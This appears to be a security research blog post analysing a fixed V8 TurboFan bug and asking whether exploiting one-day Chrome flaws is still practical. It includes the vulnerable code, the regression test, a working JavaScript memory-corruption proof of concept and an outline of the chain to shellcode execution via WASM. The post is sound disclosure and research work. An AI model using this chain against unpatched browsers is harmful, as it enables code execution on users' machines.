A EULOGY FOR PATCH-GAPPING CHROME

Authors: István Kurucsai and Vignesh S Rao

In 2019 we looked at patch gapping Chrome on two separate occasions. The conclusion was that exploiting 1day vulnerabilities well before the fixes were distributed through the stable channel is feasible and allows potential attackers to have 0day-like capabilities with only known vulnerabilities. This was the result of a combination of factors:

  • the 6-week release-cycle of Chrome that only included occasional releases in-between
  • the open-source development model that makes security fixes public before they are released to end-users
  • this is compounded by the fact that regression tests are often included with patches, reducing exploit development time significantly. It is often the case that achieving the initial corruption is the hardest part of a browser/JS engine exploit as the rest can be relatively easily reused

Mozilla seems to tackle the issue by withholding security-critical fixes from public source repositories right up to the point of a release and not including regressions tests with them. Google went with an aggressive release schedule, first to a biweekly cycle for stable, then pushing it even further with what appears to be weekly releases in February.

This post tries to examine if leveraging 1day vulnerabilities in Chrome is still practical by analyzing and exploiting a vulnerability in TurboFan. Some details of v8 that were already discussed in our previous posts will be glossed over, so we would recommend reading them as a refresher.

The vulnerability

We will be looking at Chromium issue 1053604 (restricted for the time being), fixed on the 19th of February. It has all the characteristics of a promising 1day candidate: simple but powerful-looking regression test, incorrect modeling of side-effects, easy to understand one-line change. The CL with the patch can be found here, the abbreviated code of the affected function can be seen below.

NodeProperties::InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
  JSHeapBroker* broker, Node* receiver, Node* effect,
  ZoneHandleSet<Map>* maps_return) {
    ...
    InferReceiverMapsResult result = kReliableReceiverMaps;
    while (true) {
      switch (effect->opcode()) {
      ...
        case IrOpcode::kCheckMaps: {
          Node* const object = GetValueInput(effect, 0);
          if (IsSame(receiver, object)) {
            *maps_return = CheckMapsParametersOf(effect->op()).maps();
            return result;
          }
          break;
        }
        case IrOpcode::kJSCreate: {
          if (IsSame(receiver, effect)) {
            base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
            if (initial_map.has_value()) {
              *maps_return = ZoneHandleSet<Map>(initial_map->object());
              return result;
            }
            // We reached the allocation of the {receiver}.
            return kNoReceiverMaps;
          }
+         result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.
          break;
        }
      ...  
      }
      // Stop walking the effect chain once we hit the definition of
      // the {receiver} along the {effect}s.
      if (IsSame(receiver, effect)) return kNoReceiverMaps;
      
      // Continue with the next {effect}.
      effect = NodeProperties::GetEffectInput(effect);
    }
}

The changed function, NodeProperties::InferReceiverMapsUnsafe is called through the MapInference::MapInference constructor. It is used to walk the effect chain of the compiled function backward from the use of an object as a receiver for a function call and find the set of possible maps that the object can have. For example, when encountering a CheckMaps node on the effect chain, the compiler can be sure that the map of the object can only be what the CheckMaps node looks for. In the case of the JSCreate node indicated in the vulnerability, if it creates the receiver the compiler tries to infer the possible maps for, the initial map of the created object is returned. However, if the JSCreate is for a different object than the receiver, it is assumed that it cannot change the map of the receiver. The vulnerability results from this oversight, as JSCreate accesses the prototype of the new target, which can be intercepted by a Proxy. This can cause arbitrary user JS code to execute.

In the patched version, if a JSCreate is encountered on the effect chain, the inference result is marked as unreliable. The compiler can still optimize based on the inferred maps but has to guard for them explicitly, fixing the issue.

The MapInference class is used mainly by the JSCallReducer optimizer of TurboFan, which attempts to special-case or inline some function calls based on the inferred maps of their receiver objects. The regression test included with the patch is shown below.

let a = [0, 1, 2, 3, 4];
function empty() {}
function f(p) {
  a.pop(Reflect.construct(empty, arguments, p));
}
let p = new Proxy(Object, {
  get: () => (a[0] = 1.1, Object.prototype)
});
function main(p) {
  f(p);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);

The issue is triggered in function f, through Array.prototype.pop. The Reflect.construct call is turned into a JSCreate operation, which will run user JS code if a Proxy is passed in that intercepts the prototype get access. While the pop function does not take an argument, providing the return value of Reflect.construct as one ensures that there is an effect edge between the resulting JSCreate and JSCall nodes so that the vulnerability can be triggered.

The function implementing reduction of calls to Array.prototype.pop is JSCallReducer::ReduceArrayPrototypePop, its code is shown below.

Reduction JSCallReducer::ReduceArrayPrototypePop(Node* node) {
  ...
  Node* receiver = NodeProperties::GetValueInput(node, 1);
  Node* effect = NodeProperties::GetEffectInput(node);
  Node* control = NodeProperties::GetControlInput(node);
  MapInference inference(broker(), receiver, effect);
  if (!inference.HaveMaps()) return NoChange();
  MapHandles const& receiver_maps = inference.GetMaps();
  std::vector<ElementsKind> kinds;
  if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds))  {
    return inference.NoChange();
  }
  if (!dependencies()->DependOnNoElementsProtector()) UNREACHABLE();
  inference.RelyOnMapsPreferStability(dependencies(), jsgraph(), &effect, control, p.feedback());
  std::vector<Node*> controls_to_merge;
  std::vector<Node*> effects_to_merge;
  std::vector<Node*> values_to_merge;
  Node* value = jsgraph()->UndefinedConstant();
  Node* receiver_elements_kind = LoadReceiverElementsKind(receiver, &effect, &control);
  Node* next_control = control;
  Node* next_effect = effect;
  for (size_t i = 0; i < kinds.size(); i++) {      
  // inline pop for every inferred receiver map element kind and dispatch as appropriate
  ...
  }

If the receiver maps of the call can be inferred, it replaces the JSCall to the runtime Array.prototype.pop with an implementation specialized to the element kinds of the inferred maps. Line 14 creates a MapInference object which invokes NodeProperties::InferReceiverMapsUnsafe, which infers the map(s) and also returns kReliableReceiverMaps. Based on this return value RelyOnMapsPreferStability won’t insert map checks or code dependencies. This changes in the patched version, as encountering a JSCreate during the effect chain walk will change the return value to kUnreliableReceiverMaps, which makes RelyOnMapsPreferStability insert the needed checks.

So what happens in the regression test? The array a is defined with PACKED_SMI_ELEMENTS element kind. When the f function is optimized on the third invocation of mainReflect.construct is turned into a JSCreate node, a.pop into a JSCall with an effect edge between the two. Then the JSCall is reduced based on the inferred map information, which is incorrectly marked as reliable, so no map check will be done after the Reflect.construct call. When invoked with the Proxy argument, the user JS code changes the element kind of a to PACKED_DOUBLE_ELEMENTS, then the inlined pop operates on it as if it was still a packed SMI array, leading to a type confusion.

There are many callsites of the MapInference constructor but those that look the most immediately useful are the JSCallReducers for the pop, push and shift array functions.

Exploitation

To exploit the vulnerability, it is first necessary to understand pointer compression, a recent improvement to v8. It is a scheme on 64-bit architectures to save memory by using 32-bit pointers into a 4GB-aligned, 4GB in size compressed heap. According to measurements by the developers, this saves 30-40% on the memory usage of v8. From an exploitation perspective, this has several implications:

  • on 64-bit platforms, SMIs and tagged pointers are now 32-bit in size, while doubles in unboxed arrays storage remain 64-bit
  • it adds the additional step of achieving arbitrary read/write within the compressed heap to an exploit

The vulnerability grants the addrof and fakeobj primitives readily, as we can treat unboxed double values as tagged pointers or the other way around. However, since pointer compression made tagged pointers 4-byte, it is also possible to write out-of-bounds by using a DOUBLE_ELEMENTS array, turning it into a tagged/SMI ELEMENTS array in the Proxy getter and using Array.prototype.push to add an element to this confused array. The code below uses this to modify the length of a target array to an arbitrary value.

let a = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];
var b;
a.pop();
a.pop();
a.pop();
function empty() {}
function f(nt) {
    a.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);
}
let p = new Proxy(Object, {
    get: function() {
        a[0] = {};
        b = [0.2, 1.2, 2.2, 3.2, 4.3];
        return Object.prototype;
    }
});
function main(o) {
  return f(o);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);
console.log(b.length);   // prints 819

When Line 15 converts a into HOLEY_ELEMENTS storage, its elements storage is reallocated and the unboxed double values are converted to HeapNumbers, which are just compressed pointers to a map and the double value. This makes the array shrink to half in size, then the following push call will still treat the array as if it had HOLEY_DOUBLE storage, writing to length*8, instead of length*4. We use this to corrupt the length of the b array.

At this point, the corrupted array can be conveniently used for relative OOB reads and writes with unboxed double values. From here on, exploitation follows these steps:

  • implementing addrof: can be done by allocating an object after the corrupted float array that can be used to set an inline property on it. This inline property can be read out through the corrupted array.
  • getting absolute read/write access to the compressed heap: place an array with PACKED_DOUBLE_ELEMENTS element kind after the corrupted array, change its elements pointer using the corrupted array to the desired location and read through it.
  • getting absolute uncompressed read/write: TypedArrays use 64-bit backing store pointers as they will support allocations larger than what fits on the compressed heap. Placing a TypedArray after the corrupted array and modifying its backing store thus gives absolute uncompressed read/write access.
  • code execution: load a WASM module, leak the address of the RWX mapping storing the code of one of its functions, replace it with shellcode.

The exploit code can be found here. Note that there’s no sandbox escape vulnerability included.

Conclusion

It took us around 3 days to exploit the vulnerability after discovering the fix. Considering that a potential attacker would try to couple this with a sandbox escape and also work it into their own framework, it seems safe to say that 1day vulnerabilities are impractical to exploit on a weekly or bi-weekly release cycle, hence the title of this post.

Another interesting development that affects exploit development for v8 is pointer compression. It does not complicate matters significantly (it was not meant to do that, anyway) but it might present interesting new avenues for exploitation. For example the things that reside at the beginning of the heap, the roots, the native context, the table of builtins, are now all at predictable and writable compressed addresses.

The timely analysis of these 1day and nday vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organizations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.